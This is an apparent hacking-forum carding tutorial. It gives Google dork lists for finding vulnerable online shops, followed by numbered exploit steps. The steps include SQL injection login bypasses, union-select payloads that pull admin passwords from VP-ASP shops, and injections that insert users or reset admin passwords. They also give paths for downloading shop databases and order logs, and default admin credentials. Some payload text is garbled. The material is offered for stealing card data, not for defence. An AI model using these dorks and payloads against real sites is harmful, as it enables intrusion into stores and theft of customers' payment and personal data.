Credit Card Hacking + Dorks 2015+ Dorks Explained -By Rinto

1. ##################################
2. Google Dorks List - By SUSUTEAM #
3. ##################################
4.  
5.  
6. inurl:".php?cat="+intext:"Paypal"+site:UK
7. inurl:".php?cat="+intext:"/Buy Now/"+site:.net
8. inurl:".php?cid="+intext:"online+betting"
9.  
10.  
11.  
12. inurl:".php?id=" intext:"View cart"
13. inurl:".php?id=" intext:"Buy Now"
14. inurl:".php?id=" intext:"add to cart"
15. inurl:".php?id=" intext:"shopping"
16. inurl:".php?id=" intext:"boutique"
17. inurl:".php?id=" intext:"/store/"
18. inurl:".php?id=" intext:"/shop/"
19. inurl:".php?id=" intext:"toys"
20.  
21. inurl:".php?cid="
22. inurl:".php?cid=" intext:"shopping"
23. inurl:".php?cid=" intext:"add to cart"
24. inurl:".php?cid=" intext:"Buy Now"
25. inurl:".php?cid=" intext:"View cart"
26. inurl:".php?cid=" intext:"boutique"
27. inurl:".php?cid=" intext:"/store/"
28. inurl:".php?cid=" intext:"/shop/"
29. inurl:".php?cid=" intext:"Toys"
30.  
31. inurl:".php?cat="
32. inurl:".php?cat=" intext:"shopping"
33. inurl:".php?cat=" intext:"add to cart"
34. inurl:".php?cat=" intext:"Buy Now"
35. inurl:".php?cat=" intext:"View cart"
36. inurl:".php?cat=" intext:"boutique"
37. inurl:".php?cat=" intext:"/store/"
38. inurl:".php?cat=" intext:"/shop/"
39. inurl:".php?cat=" intext:"Toys"
40.  
41. inurl:".php?catid="
42. inurl:".php?catid=" intext:"View cart"
43. inurl:".php?catid=" intext:"Buy Now"
44. inurl:".php?catid=" intext:"add to cart"
45. inurl:".php?catid=" intext:"shopping"
46. inurl:".php?catid=" intext:"boutique"
47. inurl:".php?catid=" intext:"/store/"
48. inurl:".php?catid=" intext:"/shop/"
49. inurl:".php?catid=" intext:"Toys"
50.  
51. inurl:".php?categoryid="
52. inurl:".php?categoryid=" intext:"View cart"
53. inurl:".php?categoryid=" intext:"Buy Now"
54. inurl:".php?categoryid=" intext:"add to cart"
55. inurl:".php?categoryid=" intext:"shopping"
56. inurl:".php?categoryid=" intext:"boutique"
57. inurl:".php?categoryid=" intext:"/store/"
58. inurl:".php?categoryid=" intext:"/shop/"
59. inurl:".php?categoryid=" intext:"Toys"
60.  
61. inurl:".php?pid="
62. inurl:".php?pid=" intext:"shopping"
63. inurl:".php?pid=" intext:"add to cart"
64. inurl:".php?pid=" intext:"Buy Now"
65. inurl:".php?pid=" intext:"View cart"
66. inurl:".php?pid=" intext:"boutique"
67. inurl:".php?pid=" intext:"/store/"
68. inurl:".php?pid=" intext:"/shop/"
69. inurl:".php?pid=" intext:"toys"
70.  
71. inurl:".php?prodid=
72. inurl:".php?prodid=" intext:"shopping"
73. inurl:".php?prodid=" intext:"add to cart"
74. inurl:".php?prodid=" intext:"Buy Now"
75. inurl:".php?prodid=" intext:"View cart"
76. inurl:".php?prodid=" intext:"boutique"
77. inurl:".php?prodid=" intext:"/store/"
78. inurl:".php?prodid=" intext:"/shop/"
79. inurl:".php?prodid=" intext:"toys"
80.  
81. inurl:".php?productid='
82. inurl:".php?productid=" intext:"shopping"
83. inurl:".php?productid=" intext:"add to cart"
84. inurl:".php?productid=" intext:"Buy Now"
85. inurl:".php?productid=" intext:"View cart"
86. inurl:".php?productid=" intext:"boutique"
87. inurl:".php?productid=" intext:"/store/"
88. inurl:".php?productid=" intext:"/shop/"
89. inurl:".php?productid=" intext:"Toys"
90.  
91. inurl:".php?product="
92. inurl:".php?product=" intext:"shopping"
93. inurl:".php?product=" intext:"add to cart"
94. inurl:".php?product=" intext:"Buy Now"
95. inurl:".php?product=" intext:"View cart"
96. inurl:".php?product=" intext:"boutique"
97. inurl:".php?product=" intext:"/store/"
98. inurl:".php?product=" intext:"/shop/"
99. inurl:".php?product=" intext:"toys"
100. inurl:".php?product=" intext:"DVD"
101.  
102. inurl:".php?products="
103. inurl:".php?products=" intext:"shopping"
104. inurl:".php?products=" intext:"add to cart"
105. inurl:".php?products=" intext:"Buy Now"
106. inurl:".php?products=" intext:"View cart"
107. inurl:".php?products=" intext:"boutique"
108. inurl:".php?products=" intext:"/store/"
109. inurl:".php?products=" intext:"/shop/"
110. inurl:".php?products=" intext:"toys"
111. inurl:".php?products=" intext:"DVD"
112.  
113. inurl:".php?proid="
114. inurl:".php?proid=" intext:"shopping"
115. inurl:".php?proid=" intext:"add to cart"
116. inurl:".php?proid=" intext:"Buy Now"
117. inurl:".php?proid=" intext:"View cart"
118. inurl:".php?proid=" intext:"boutique"
119. inurl:".php?proid=" intext:"/store/"
120. inurl:".php?proid=" intext:"/shop/"
121. inurl:".php?proid=" intext:"toys"
122.  
123. inurl:".php?shopid="
124. inurl:".php?shopid=" intext:"shopping"
125. inurl:".php?shopid=" intext:"add to cart"
126. inurl:".php?shopid=" intext:"Buy Now"
127. inurl:".php?shopid=" intext:"View cart"
128. inurl:".php?shopid=" intext:"boutique"
129. inurl:".php?shopid=" intext:"/store/"
130. inurl:".php?shopid=" intext:"/shop/"
131. inurl:".php?shopid=" intext:"Toys"
132.  
133. inurl:".php?itemid="
134. inurl:".php?itemid=" intext:"shopping"
135. inurl:".php?itemid=" intext:"add to cart"
136. inurl:".php?itemid=" intext:"Buy Now"
137. inurl:".php?itemid=" intext:"View cart"
138. inurl:".php?itemid=" intext:"boutique"
139. inurl:".php?itemid=" intext:"/shop/"
140. inurl:".php?itemid=" intext:"/store/"
141. inurl:".php?itemid=" intext:"Toys"
142.  
143. inurl:".php?orderid="
144. inurl:".php?orderid=" intext:"shopping"
145. inurl:".php?orderid=" intext:"add to cart"
146. inurl:".php?orderid=" intext:"Buy Now"
147. inurl:".php?orderid=" intext:"View cart"
148. inurl:".php?orderid=" intext:"boutique"
149. inurl:".php?orderid=" intext:"/shop/"
150. inurl:".php?orderid=" intext:"/store/"
151. inurl:".php?orderid=" intext:"Toys"
152.  
153.  
154. inurl:".php?catalogId="
155. inurl:".php?catalogId=" intext:"shopping"
156. inurl:".php?catalogId=" intext:"add to cart"
157. inurl:".php?catalogId=" intext:"Buy Now"
158. inurl:".php?catalogId=" intext:"View cart"
159. inurl:".php?catalogId=" intext:"boutique"
160. inurl:".php?catalogId=" intext:"/shop/"
161. inurl:".php?catalogId=" intext:"/store/"
162. inurl:".php?catalogId=" intext:"Toys"
163.  
164. inurl:".php?aid="
165. inurl:".php?aid=" intext:"shopping"
166. inurl:".php?aid=" intext:"add to cart"
167. inurl:".php?aid=" intext:"Buy Now"
168. inurl:".php?aid=" intext:"View cart"
169. inurl:".php?aid=" intext:"boutique"
170. inurl:".php?aid=" intext:"/shop/"
171. inurl:".php?aid=" intext:"/store/"
172. inurl:".php?aid=" intext:"toys"
173.  
174. inurl:".php?artid="
175. inurl:".php?artid=" intext:"shopping"
176. inurl:".php?artid=" intext:"add to cart"
177. inurl:".php?artid=" intext:"Buy Now"
178. inurl:".php?artid=" intext:"View cart"
179. inurl:".php?artid=" intext:"boutique"
180. inurl:".php?artid=" intext:"/shop/"
181. inurl:".php?artid=" intext:"/store/"
182. inurl:".php?artid=" intext:"toys"
183.  
184.  
185. inurl:".php?articleid="
186. inurl:".php?articleid=" intext:"shopping"
187. inurl:".php?articleid=" intext:"add to cart"
188. inurl:".php?articleid=" intext:"Buy Now"
189. inurl:".php?articleid=" intext:"View cart"
190. inurl:".php?articleid=" intext:"boutique"
191. inurl:".php?articleid=" intext:"/shop/"
192. inurl:".php?articleid=" intext:"/store/"
193. inurl:".php?articleid=" intext:"toys"
194.  
195. ##############################################
196. Dork list +How to Do Carding- 2015 - March 20#
197. ##############################################
198.  
199. DORK CARDING 2015 AND HOW TO EXPLOIT
200. ============Legion7sign============
201.  
202. user.php?id=
203. user.bmlid=
204. user.jsp?id=
205. user.cfm?id=
206. user.htlm?id=
207. user.php?CategoryID=
208. user.php?shopID=
209. user.php?shippingID=
210. user.php?infoID=
211. user.php?custID=
212. user.php?webID=
213. user.php?cad=
214.  
215. How to exploit :
216.  
217. [-]Tool
218. -gr3enox exploit scanner
219.  
220.  
221. Example dork :
222. paypal : user.php?id=
223. CreditCard : user.php?pay=
224.  
225. Paypal :
226. user.php?id= < you can edit this dork :
227. customer.php?id=
228.  
229. if you want to exploit just change the customer < & id < only
230. example : payment.php?aspx=
231. payment.php?jsp=
232.  
233. Credit Card :
234. user.php?pay= < example dork cc you can change :
235. customer.php?pay=
236.  
237. wanna try ?
238.  
239. just change customer < & pay <
240.  
241. example :
242.  
243. amex.php?CategoryID=
244.  
245. exploit sample :
246. u.php?jsp=
247. u.php?aspx=
248. u.php?id=
249. u.php?pay=
250. u.php?cat=
251. u.php?search=
252. u.php?urlid=
253. u.php?car=
254.  
255. *PS : " You can add site like this : u.php?car=+site:uk
256.  
257. =======IT'S AT YOUR OWN RISK=======
258.  
259.  
260. ##############################
261. Full Explanation For Carding##
262. ##############################
263.  
264.  
265. ###############
266. SuSu Hack Team#
267. ###############
268.  
269. 1:
270. google dork :--> inurl:"/cart.php?m="
271. target looks lile :--> ...cart.php?m=view
272. exploit: chage cart.php?m=view to /admin
273. target whit exploit :-->
274. Usename : 'or"="
275. Password : 'or"=
276.  
277. 2:
278. google dork :--> allinurlroddetail.asp?prod=
279. target looks like :--> xxxxx.org (big leters and numbers )
280. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
281. target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
282.  
283. 3:
284. google dork :--> allinurl: /cgi-local/shopper.cgi
285. target looks like :--> ....dd=action&key=
286. exploit :--> ...&template=order.log
287. target whit exploit :--> .....late=order.log
288.  
289. 4:
290. google dork :--> allinurl: Lobby.asp
291. target looks like :--> www.xxxxx.com/mall/lobby.asp
292. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
293. target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
294.  
295. 5:
296. google dork :--> allinurl:/vpasp/shopsearch.asp
297. when u find a target put this in search box
298. Keyword=&category=5); insert into tbluser (fldusername) values
299. ('')--&SubCategory=&hide=&action.x=46&action.y=6
300. Keyword=&category=5); update tbluser set fldpassword='' where
301. fldusername=''--&SubCategory=All&action.x=33&action.y=6
302. Keyword=&category=3); update tbluser set fldaccess='1' where
303. fldusername=''--&SubCategory=All&action.x=33&action.y=6
304. Jangan lupa untuk mengganti dan nya terserah kamu.
305. Untuk mengganti password admin, masukkan keyword berikut :
306. Keyword=&category=5); update tbluser set fldpassword='' where
307. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
308.  
309. login page:
310.  
311. 6:
312. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
313. target looks like :--> ....asp?cat=xxxxxx
314. exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
315. if this is not working try this ends
316. %20'a%25'--
317. %20'b%25'--
318. %20'c%25'--
319. after finding user and pass go to login page:
320.  
321. 7:
322. google dork :--> allinurl:/shopadmin.asp
323. target looks like :--> www.xxxxxx.com/shopadmin.asp
324. exploit:
325. user : 'or'1
326. pass : 'or'1
327.  
328. 8:
329. google.com :--> allinurl:/store/index.cgi/page=
330. target looks like :--> ....shortblue.htm
331. exploit :--> ../admin/files/order.log
332. target whit exploit :--> .c....iles/order.log
333.  
334. 9:
335. google.com:--> allinurl:/metacart/
336. target looks like :--> www.xxxxxx.com/metacart/about.asp
337. exploit :--> /database/metacart.mdb
338. target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
339.  
340. 10:
341. google.com:--> allinurl:/DCShop/
342. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
343. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
344. target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
345.  
346. 11:
347. google.com:--> allinurl:/shop/category.asp/catid=
348. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
349. exploit :--> /admin/dbsetup.asp
350. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
351. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
352. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
353. in db look for access to find pass and user of shop admins.
354.  
355. 12:
356. google.com:--> allinurl:/commercesql/
357. target looks like :--> www.xxxxx.com/commercesql/xxxxx
358. exploit :--> cgi-bin/commercesql/index.cgi?page=
359. target whit exploit admin config :--> ..../adminconf.pl
360. target whit exploit admin manager :--> ....in/manager.cgi
361. target whit exploit order.log :--> ....iles/order.log
362.  
363. 13:
364. google.com:--> allinurl:/eshop/
365. target looks like :--> www.xxxxx.com/xxxxx/eshop
366. exploit :-->/cg-bin/eshop/database/order.mdb
367. target whit exploit :--> ....base/order.mdb
368. after dl the db look at access for user and password
369.  
370. 14:
371. 1/ search google: allinurl:"shopdisplayproducts.asp?id=
372. --->=5
373.  
374. 2/ find error by adding '
375. --->=5'
376.  
377. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
378.  
379. -If you don't see error then change id to cat
380.  
381. --->=5'
382.  
383. 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
384.  
385. --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
386.  
387. --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of column in the two selected tables or queries of a union queries do not match......
388.  
389. 4/ add 2,3,4,5,6.......until you see a nice table
390.  
391. add 2
392. ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
393. then 3
394. ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
395. then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
396.  
397. ...5,6,7,8,9.... untill you see a table. (exp:...47)
398.  
399. ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
400. ---->see a table.
401.  
402. 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
403.  
404. --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
405.  
406. 6/ Find link admin to login:
407. try this first:
408. or:
409.  
410. Didn't work? then u have to find yourself:
411.  
412. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
413.  
414. --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
415.  
416. you'll see something like: ( lot of them)
417.  
418. shopaddmoretocart.asp
419. shopcheckout.asp
420. shopdisplaycategories.asp
421. ..............
422.  
423. then guess admin link by adding the above data untill you find admin links
424.  
425. 15:
426. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
427. the most important thing here is xDatabase
428. xDatabase: shopping140
429. ok now the URL will be like this:
430. ****://.victim.com/shop/shopping140.mdb
431. if you didn't download the Database..
432. Try this while there is dblocation.
433. xDblocation
434. resx
435.  
436. the url will be:
437. ****://.victim.com/shop/resx/shopping140.mdb
438. If u see the error message you have to try this :
439. ****://.victim.com/shop/shopping500.mdb
440.  
441. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
442.  
443. inside you should be able to find *** information.
444. and you should even be able to find the admin username and password for the website.
445.  
446. the admin login page is usually located here
447. ****://.victim.com/shop/shopadmin.asp
448.  
449. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
450.  
451. Username: admin
452. password: admin
453. OR
454. Username: vpasp
455. password: vpasp
456.  
457. Hope you enjoy this !!
458.  
459.  
460.  
461. By Rinto